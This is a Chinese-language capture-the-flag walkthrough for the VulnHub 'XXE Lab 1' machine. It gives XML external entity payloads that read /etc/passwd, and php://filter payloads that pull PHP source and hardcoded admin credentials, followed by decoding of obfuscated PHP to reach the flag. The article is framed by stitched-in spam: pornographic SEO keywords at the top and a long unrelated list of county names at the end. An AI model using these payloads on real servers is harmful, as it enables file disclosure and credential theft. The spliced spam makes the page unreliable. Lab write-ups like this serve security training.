五月天青色头像情侣网名,国产亚洲av片在线观看18女人,黑人巨茎大战俄罗斯美女,扒下她的小内裤打屁股

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊(cè)

【攻略鴨】XXE Lab 1_VulnHub靶機(jī)攻略

2023-01-06 11:06 作者:攻略鴨  | 我要投稿

本文內(nèi)容純屬虛構(gòu),B站攻略鴨求關(guān)注點(diǎn)贊支持!

靶機(jī)地址:

$ sudo arp-scan -l
192.168.221.151

http://192.168.221.151/xxe/

外部信息收集

端口掃描

80/tcp ? open ?http ? ?syn-ack ttl 64 Apache httpd 2.4.27 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/xxe/* /admin.php
5355/tcp open ?llmnr? ?syn-ack ttl 1

網(wǎng)站信息

看到登錄框,嘗試登錄并抓包:

POST /xxe/xxe.php HTTP/1.1
Host: 192.168.221.151
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 95
Origin: http://192.168.221.151
Connection: close
Referer: http://192.168.221.151/xxe/

<?xml version="1.0" encoding="UTF-8"?><root><name>tester</name><password>test</password></root>

修改請(qǐng)求包測(cè)試:

POST /xxe/xxe.php HTTP/1.1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY tester SYSTEM "file:///etc/passwd">
]>
<root><name>&tester;</name><password>test</password></root>

返回包:

root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
xxx省略部分xxx
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:104:108::/home/syslog:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
_apt:x:106:65534::/nonexistent:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
r00t:x:1000:1000:Administrator,,,:/home/r00t:/bin/bash

可見(jiàn)存在XXE漏洞。

XXE漏洞利用

直接訪問(wèn)http://192.168.221.151/admin.php返回404。

利用XXE漏洞讀取PHP文件:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">

返回值Base64解碼后主要內(nèi)容為:

<?php
? ?$msg = '';
? ?if (isset($_POST['login']) && !empty($_POST['username'])
? ? ? && !empty($_POST['password'])) {
?

? ? ? if ($_POST['username'] == 'administhebest' &&
? ? ? ? ?md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
? ? ? ? ?$_SESSION['valid'] = true;
? ? ? ? ?$_SESSION['timeout'] = time();
? ? ? ? ?$_SESSION['username'] = 'administhebest';
? ? ? ? ?
? ? ? ?echo "You have entered valid use name and password <br />";
$flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
echo $flag;
? ? ? }else {
? ? ? ? ?$msg = 'Maybe Later';
? ? ? }
? ?}
?>
</div> <!-- W00t/W00t -->

整理上面信息得到:

Flag位置:/flagmeout.php
username:administhebest
password:admin@123(md5:e6e061838856bf47e1de730719fb2609)
W00t/W00t

利用XXE讀取flagmeout.php:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=flagmeout.php">

返回值Base64解碼后為:

<?php
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
echo $flag;
?>

注釋表明flag位置需要解碼32位的JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5 Base32解碼得到L2V0Yy8uZmxhZy5waHA= 再Base64解碼得到/etc/.flag.php

利用XXE讀取/etc/.flag.php:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">

得到:

JF9bXSsrOyRfW109JF8uXzskX19fX189JF9bKCsrJF9fW10pXVsoKyskX19bXSkrKCsrJF9fW10pKygrKyRfX1tdKV07JF89JF9bJF9bK19dXTskX19fPSRfXz0kX1srKyRfX1tdXTskX19fXz0kXz0kX1srX107JF8rKzskXysrOyRfKys7JF89JF9fX18uKyskX19fLiRfX18uKyskXy4kX18uKyskX19fOyRfXz0kXzskXz0kX19fX187JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7JF8rKzskX19fPStfOyRfX18uPSRfXzskX19fPSsrJF9eJF9fX1srX107JMOAPStfOyTDgT0kw4I9JMODPSTDhD0kw4Y9JMOIPSTDiT0kw4o9JMOLPSsrJMOBW107JMOCKys7JMODKys7JMODKys7JMOEKys7JMOEKys7JMOEKys7JMOGKys7JMOGKys7JMOGKys7JMOGKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JF9fKCckXz0iJy4kX19fLiTDgS4kw4IuJMODLiRfX18uJMOBLiTDgC4kw4EuJF9fXy4kw4EuJMOALiTDiC4kX19fLiTDgS4kw4AuJMODLiRfX18uJMOBLiTDgi4kw4MuJF9fXy4kw4EuJMOCLiTDgC4kX19fLiTDgS4kw4kuJMODLiRfX18uJMOBLiTDiS4kw4AuJF9fXy4kw4EuJMOJLiTDgC4kX19fLiTDgS4kw4QuJMOGLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOGLiTDgS4kX19fLiTDgS4kw4guJMODLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOILiTDgy4kX19fLiTDgS4kw4YuJMOJLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOELiTDhi4kX19fLiTDgS4kw4QuJMOBLiRfX18uJMOBLiTDiC4kw4MuJF9fXy4kw4EuJMOJLiTDgS4kX19fLiTDgS4kw4kuJMOGLiciJyk7JF9fKCRfKTsK

Base64解碼得到:

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$à=+_;$á=$?=$?=$?=$?=$è=$é=$ê=$?=++$á[];$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$è++;$è++;$è++;$è++;$è++;$é++;$é++;$é++;$é++;$é++;$é++;$ê++;$ê++;$ê++;$ê++;$ê++;$ê++;$ê++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$__('$_="'.$___.$á.$?.$?.$___.$á.$à.$á.$___.$á.$à.$è.$___.$á.$à.$?.$___.$á.$?.$?.$___.$á.$?.$à.$___.$á.$é.$?.$___.$á.$é.$à.$___.$á.$é.$à.$___.$á.$?.$?.$___.$á.$?.$é.$___.$á.$?.$á.$___.$á.$è.$?.$___.$á.$?.$é.$___.$á.$è.$?.$___.$á.$?.$é.$___.$á.$?.$é.$___.$á.$?.$?.$___.$á.$?.$á.$___.$á.$è.$?.$___.$á.$é.$á.$___.$á.$é.$?.'"');$__($_);

再腳本首部添加<?php,運(yùn)行PHP腳本得到flag:SAFCSP{xxe_is_so_easy}

標(biāo)簽:

【攻略鴨】XXE Lab 1_VulnHub靶機(jī)攻略的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國(guó)家法律
杭锦旗| 和政县| 孟州市| 莲花县| 巫溪县| 邢台市| 临沂市| 工布江达县| 临高县| 曲麻莱县| 荆门市| 白沙| 库伦旗| 抚松县| 丹江口市| 乳源| 怀来县| 逊克县| 五寨县| 城口县| 汝南县| 武邑县| 那坡县| 灯塔市| 南乐县| 集贤县| 永寿县| 琼结县| 健康| 卢龙县| 鸡泽县| 河池市| 克东县| 阿坝县| 玛多县| 灵台县| 河间市| 曲周县| 田东县| 历史| 上林县|